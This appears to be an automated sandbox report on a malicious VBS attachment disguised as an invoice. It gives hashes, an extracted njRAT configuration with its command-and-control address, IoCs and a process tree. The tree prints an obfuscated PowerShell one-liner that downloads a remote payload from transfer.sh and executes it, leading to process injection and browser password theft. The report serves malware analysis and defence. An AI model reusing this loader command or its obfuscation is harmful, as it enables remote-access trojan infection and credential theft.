Analysis
-
max time kernel
152s -
max time network
155s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
24-08-2021 11:38
Static task
static1
Behavioral task
behavioral1
Sample
Invoice#4110.vbs
Resource
win7v20210410
General
-
Target
Invoice#4110.vbs
-
Size
748B
-
MD5
f88564ad95f97097002bfa11a67d288f
-
SHA1
49d1056e48981200f7674432c0562163a8d65db5
-
SHA256
410bfd3ac457f14f653b82ad2090dbdd24c5d689d4bb766f6c18e1c1ee8c171a
-
SHA512
c7448569083d36592caec1360d59ebb5092970cd8d40268e280110fdcbaa7ddff324b71c055febf1e4dee0bd9315ee56c90cfff6b8fa46f72aec84e620099bc6
Malware Config
Extracted
https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt
Extracted
njrat
v4.0
Boss
103.147.184.73:7103
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
NirSoft WebBrowserPassView 4 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp WebBrowserPassView \Users\Admin\AppData\Local\Temp\SQL.exe WebBrowserPassView \Users\Admin\AppData\Local\Temp\SQL.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\SQL.exe WebBrowserPassView -
Nirsoft 4 IoCs
Processes:
resource yara_rule behavioral1/memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmp Nirsoft \Users\Admin\AppData\Local\Temp\SQL.exe Nirsoft \Users\Admin\AppData\Local\Temp\SQL.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\SQL.exe Nirsoft -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 1392 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
SQL.exepid process 824 SQL.exe -
Loads dropped DLL 2 IoCs
Processes:
aspnet_regbrowsers.exepid process 544 aspnet_regbrowsers.exe 544 aspnet_regbrowsers.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1392 set thread context of 544 1392 powershell.exe aspnet_regbrowsers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeSQL.exepid process 1392 powershell.exe 1392 powershell.exe 824 SQL.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
powershell.exeaspnet_regbrowsers.exedescription pid process Token: SeDebugPrivilege 1392 powershell.exe Token: SeDebugPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe Token: 33 544 aspnet_regbrowsers.exe Token: SeIncBasePriorityPrivilege 544 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exeaspnet_regbrowsers.exedescription pid process target process PID 1072 wrote to memory of 1392 1072 WScript.exe powershell.exe PID 1072 wrote to memory of 1392 1072 WScript.exe powershell.exe PID 1072 wrote to memory of 1392 1072 WScript.exe powershell.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 1392 wrote to memory of 544 1392 powershell.exe aspnet_regbrowsers.exe PID 544 wrote to memory of 824 544 aspnet_regbrowsers.exe SQL.exe PID 544 wrote to memory of 824 544 aspnet_regbrowsers.exe SQL.exe PID 544 wrote to memory of 824 544 aspnet_regbrowsers.exe SQL.exe PID 544 wrote to memory of 824 544 aspnet_regbrowsers.exe SQL.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#4110.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'https://transfer.sh/Bnlx/passsssssssssssssss_bypass.txt';$EDRFGHNJMKDEFGHJ = 'nE----------------EbC++++++++++++++++T'.Replace('----------------','t.W').Replace('++++++++++++++++','lIEN');$SXDCFVGBHNJXDCFVGBHJK = 'DO*************aDST<<<<<<<<<>>>>>>>>>>>G'.Replace('*************','WnLo').Replace('<<<<<<<<<>>>>>>>>>>>','rIn');$SWXDECRFGYHUJISDFVGHJ ='I`EX(n`-------------`c`T $EDRFGHNJMKD<<<<<<<<<<<<<<>>>>>>>>>>>>>>GBHNJSDFGH)'.Replace('-------------','e`W`-Obj`E').Replace('<<<<<<<<<<<<<<>>>>>>>>>>>>>>','EFGHJ).$SXDCFVGBHNJXDCFVGBHJK($SZXDCFV');&('I'+'EX')($SWXDECRFGYHUJISDFVGHJ -Join '')|&('I'+'EX');2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\SQL.exeC:\Users\Admin\AppData\Local\Temp\\SQL.exe /stext C:\Users\Admin\AppData\Local\Temp\FPS6TEMP10.txt4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\FPS6TEMP10.txtMD5
f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Local\Temp\SQL.exeMD5
a38281982740d4bcb1cb71d13508735b
SHA179caace31d17deb4f37c56cd8af4e3731be12324
SHA2568ef45a1d9c797be035b17e09a7db9c07a1daf46112c910a4186ddd1048a2e222
SHA512e615122344dddf825017f6e1123ce66419650adc2691d27f743d1f96ed81f325a2f5f23e5892384a76ff92412028940b413bec7c61454b980b1163eb7da4d2fb
-
\Users\Admin\AppData\Local\Temp\SQL.exeMD5
a38281982740d4bcb1cb71d13508735b
SHA179caace31d17deb4f37c56cd8af4e3731be12324
SHA2568ef45a1d9c797be035b17e09a7db9c07a1daf46112c910a4186ddd1048a2e222
SHA512e615122344dddf825017f6e1123ce66419650adc2691d27f743d1f96ed81f325a2f5f23e5892384a76ff92412028940b413bec7c61454b980b1163eb7da4d2fb
-
\Users\Admin\AppData\Local\Temp\SQL.exeMD5
a38281982740d4bcb1cb71d13508735b
SHA179caace31d17deb4f37c56cd8af4e3731be12324
SHA2568ef45a1d9c797be035b17e09a7db9c07a1daf46112c910a4186ddd1048a2e222
SHA512e615122344dddf825017f6e1123ce66419650adc2691d27f743d1f96ed81f325a2f5f23e5892384a76ff92412028940b413bec7c61454b980b1163eb7da4d2fb
-
memory/544-90-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/544-96-0x00000000045F0000-0x0000000004650000-memory.dmpFilesize
384KB
-
memory/544-95-0x0000000005420000-0x0000000005421000-memory.dmpFilesize
4KB
-
memory/544-94-0x0000000075411000-0x0000000075413000-memory.dmpFilesize
8KB
-
memory/544-92-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/544-91-0x000000000040836E-mapping.dmp
-
memory/824-99-0x0000000000000000-mapping.dmp
-
memory/1072-60-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmpFilesize
8KB
-
memory/1392-67-0x000000001AB94000-0x000000001AB96000-memory.dmpFilesize
8KB
-
memory/1392-70-0x0000000002640000-0x0000000002641000-memory.dmpFilesize
4KB
-
memory/1392-88-0x000000001C5B0000-0x000000001C5B1000-memory.dmpFilesize
4KB
-
memory/1392-89-0x000000001B4C0000-0x000000001B4C3000-memory.dmpFilesize
12KB
-
memory/1392-85-0x0000000002720000-0x0000000002721000-memory.dmpFilesize
4KB
-
memory/1392-86-0x0000000002730000-0x0000000002731000-memory.dmpFilesize
4KB
-
memory/1392-73-0x000000001AB40000-0x000000001AB41000-memory.dmpFilesize
4KB
-
memory/1392-87-0x000000001AB9A000-0x000000001ABB9000-memory.dmpFilesize
124KB
-
memory/1392-69-0x000000001B780000-0x000000001B781000-memory.dmpFilesize
4KB
-
memory/1392-68-0x0000000002240000-0x0000000002241000-memory.dmpFilesize
4KB
-
memory/1392-66-0x000000001AB90000-0x000000001AB92000-memory.dmpFilesize
8KB
-
memory/1392-65-0x00000000022E0000-0x00000000022E1000-memory.dmpFilesize
4KB
-
memory/1392-64-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/1392-63-0x0000000002200000-0x0000000002201000-memory.dmpFilesize
4KB
-
memory/1392-61-0x0000000000000000-mapping.dmp